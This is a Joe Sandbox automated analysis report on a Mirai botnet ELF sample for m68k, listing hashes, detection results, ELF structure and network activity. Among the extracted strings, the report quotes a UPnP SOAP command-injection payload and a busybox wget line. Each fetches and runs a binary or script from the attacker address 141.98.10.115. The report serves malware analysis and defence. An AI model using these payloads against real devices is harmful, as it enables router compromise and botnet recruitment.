Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
UnHAnaAW.m68k.elf

Overview

General Information

Sample name:UnHAnaAW.m68k.elf
Analysis ID:1588067
MD5:6f9e2d2d7ff9a55df68eb6eaa3a29994
SHA1:3b2d9d27a0fad76b96c96a93b0d600666125dd70
SHA256:bd865df7dfe9bc681f28f79437a8b5eda710d604ca15fc4e49e0ae217a2ddcb8
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588067
Start date and time:2025-01-10 21:07:44 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:UnHAnaAW.m68k.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@2/0
  • VT rate limit hit for: http://141.98.10.115/bins/x86
  • VT rate limit hit for: http://141.98.10.115/zyxel.sh;
Command:/tmp/UnHAnaAW.m68k.elf
PID:5551
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • UnHAnaAW.m68k.elf (PID: 5551, Parent: 5479, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/UnHAnaAW.m68k.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
UnHAnaAW.m68k.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5551.1.00007f9af4015000.00007f9af4017000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      5551.1.00007f9af4001000.00007f9af4014000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Process Memory Space: UnHAnaAW.m68k.elf PID: 5551JoeSecurity_Mirai_6Yara detected MiraiJoe Security
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: UnHAnaAW.m68k.elfAvira: detected
          Source: UnHAnaAW.m68k.elfReversingLabs: Detection: 65%
          Source: UnHAnaAW.m68k.elfVirustotal: Detection: 66%Perma Link
          Source: /tmp/UnHAnaAW.m68k.elf (PID: 5551)Socket: 127.0.0.1:23455Jump to behavior
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
          Source: UnHAnaAW.m68k.elfString found in binary or memory: http://141.98.10.115/bins/x86
          Source: UnHAnaAW.m68k.elfString found in binary or memory: http://141.98.10.115/zyxel.sh;
          Source: UnHAnaAW.m68k.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: UnHAnaAW.m68k.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.115 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.115/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: classification engineClassification label: mal64.troj.linELF@0/0@2/0
          Source: /tmp/UnHAnaAW.m68k.elf (PID: 5551)Queries kernel information via 'uname': Jump to behavior
          Source: UnHAnaAW.m68k.elf, 5551.1.000055f0fdaf3000.000055f0fdb57000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/m68k
          Source: UnHAnaAW.m68k.elf, 5551.1.00007ffe08107000.00007ffe08128000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
          Source: UnHAnaAW.m68k.elf, 5551.1.000055f0fdaf3000.000055f0fdb57000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
          Source: UnHAnaAW.m68k.elf, 5551.1.00007ffe08107000.00007ffe08128000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/UnHAnaAW.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/UnHAnaAW.m68k.elf
          Source: UnHAnaAW.m68k.elf, 5551.1.00007ffe08107000.00007ffe08128000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: UnHAnaAW.m68k.elf, type: SAMPLE
          Source: Yara matchFile source: 5551.1.00007f9af4015000.00007f9af4017000.rw-.sdmp, type: MEMORY
          Source: Yara matchFile source: 5551.1.00007f9af4001000.00007f9af4014000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: UnHAnaAW.m68k.elf PID: 5551, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: UnHAnaAW.m68k.elf, type: SAMPLE
          Source: Yara matchFile source: 5551.1.00007f9af4015000.00007f9af4017000.rw-.sdmp, type: MEMORY
          Source: Yara matchFile source: 5551.1.00007f9af4001000.00007f9af4014000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: UnHAnaAW.m68k.elf PID: 5551, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System1
          Non-Application Layer Protocol
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          SourceDetectionScannerLabelLink
          UnHAnaAW.m68k.elf66%ReversingLabsLinux.Backdoor.Mirai
          UnHAnaAW.m68k.elf67%VirustotalBrowse
          UnHAnaAW.m68k.elf100%AviraEXP/ELF.Mirai.Bootnet.o
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          daisy.ubuntu.com
          162.213.35.24
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://141.98.10.115/bins/x86UnHAnaAW.m68k.elffalse
              unknown
              http://141.98.10.115/zyxel.sh;UnHAnaAW.m68k.elffalse
                unknown
                http://schemas.xmlsoap.org/soap/encoding/UnHAnaAW.m68k.elffalse
                  high
                  http://schemas.xmlsoap.org/soap/envelope/UnHAnaAW.m68k.elffalse
                    high
                    No contacted IP infos
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    daisy.ubuntu.comUnHAnaAW.mips.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    UnHAnaAW.spc.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    UnHAnaAW.arm6.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    UnHAnaAW.x86.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    UnHAnaAW.arm5.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.25
                    UnHAnaAW.ppc.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    UnHAnaAW.arm.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    woega6.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    ssc.elfGet hashmaliciousGafgytBrowse
                    • 162.213.35.24
                    frosty.arm5.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                    Entropy (8bit):6.310360445294874
                    TrID:
                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                    File name:UnHAnaAW.m68k.elf
                    File size:78'812 bytes
                    MD5:6f9e2d2d7ff9a55df68eb6eaa3a29994
                    SHA1:3b2d9d27a0fad76b96c96a93b0d600666125dd70
                    SHA256:bd865df7dfe9bc681f28f79437a8b5eda710d604ca15fc4e49e0ae217a2ddcb8
                    SHA512:972a040d43eacb517cb329665cf120f20b7e3c4efcf2fe700bb032b669e7c7cdacf3090ffad3b63a43ac21f463c39cbf97742f7b4ee9ca552a0787a27ac75946
                    SSDEEP:768:reN0R6jknQ6MEYyyZbRiIXWqxO5K5hZdcGaRJHmhAD+qhudQamBUS7zPKPVItnKt:rPbWyylRiBcDpTqwuaQ7zPKNItK8UF
                    TLSH:32734BD9A8025E3CF84BE6BD94220B09FA24631557930F2BE59EFDD3BD731549E02D82
                    File Content Preview:.ELF.......................D...4..2L.....4. ...(....................../.../....... ......./...O...O....(.......... .dt.Q............................NV..a....da...$@N^NuNV..J9..R.f>"y..O. QJ.g.X.#...O.N."y..O. QJ.f.A.....J.g.Hy../.N.X.......R.N^NuNV..N^NuN

                    ELF header

                    Class:ELF32
                    Data:2's complement, big endian
                    Version:1 (current)
                    Machine:MC68000
                    Version Number:0x1
                    Type:EXEC (Executable file)
                    OS/ABI:UNIX - System V
                    ABI Version:0
                    Entry Point Address:0x80000144
                    Flags:0x0
                    ELF Header Size:52
                    Program Header Offset:52
                    Program Header Size:32
                    Number of Program Headers:3
                    Section Header Offset:78412
                    Section Header Size:40
                    Number of Section Headers:10
                    Header String Table Index:9
                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                    NULL0x00x00x00x00x0000
                    .initPROGBITS0x800000940x940x140x00x6AX002
                    .textPROGBITS0x800000a80xa80x1246a0x00x6AX004
                    .finiPROGBITS0x800125120x125120xe0x00x6AX002
                    .rodataPROGBITS0x800125200x125200xac00x00x2A002
                    .ctorsPROGBITS0x80014fe40x12fe40x80x00x3WA004
                    .dtorsPROGBITS0x80014fec0x12fec0x80x00x3WA004
                    .dataPROGBITS0x80014ff80x12ff80x2140x00x3WA004
                    .bssNOBITS0x8001520c0x1320c0x2d80x00x3WA004
                    .shstrtabSTRTAB0x00x1320c0x3e0x00x0001
                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                    LOAD0x00x800000000x800000000x12fe00x12fe06.33500x5R E0x2000.init .text .fini .rodata
                    LOAD0x12fe40x80014fe40x80014fe40x2280x5003.05600x6RW 0x2000.ctors .dtors .data .bss
                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                    TimestampSource PortDest PortSource IPDest IP
                    Jan 10, 2025 21:08:42.072484970 CET5314053192.168.2.151.1.1.1
                    Jan 10, 2025 21:08:42.072557926 CET4141953192.168.2.151.1.1.1
                    Jan 10, 2025 21:08:42.079647064 CET53531401.1.1.1192.168.2.15
                    Jan 10, 2025 21:08:42.080382109 CET53414191.1.1.1192.168.2.15
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 10, 2025 21:08:42.072484970 CET192.168.2.151.1.1.10x2cd2Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                    Jan 10, 2025 21:08:42.072557926 CET192.168.2.151.1.1.10xb764Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 10, 2025 21:08:42.079647064 CET1.1.1.1192.168.2.150x2cd2No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                    Jan 10, 2025 21:08:42.079647064 CET1.1.1.1192.168.2.150x2cd2No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                    System Behavior

                    Start time (UTC):20:08:40
                    Start date (UTC):10/01/2025
                    Path:/tmp/UnHAnaAW.m68k.elf
                    Arguments:/tmp/UnHAnaAW.m68k.elf
                    File size:4463432 bytes
                    MD5 hash:cd177594338c77b895ae27c33f8f86cc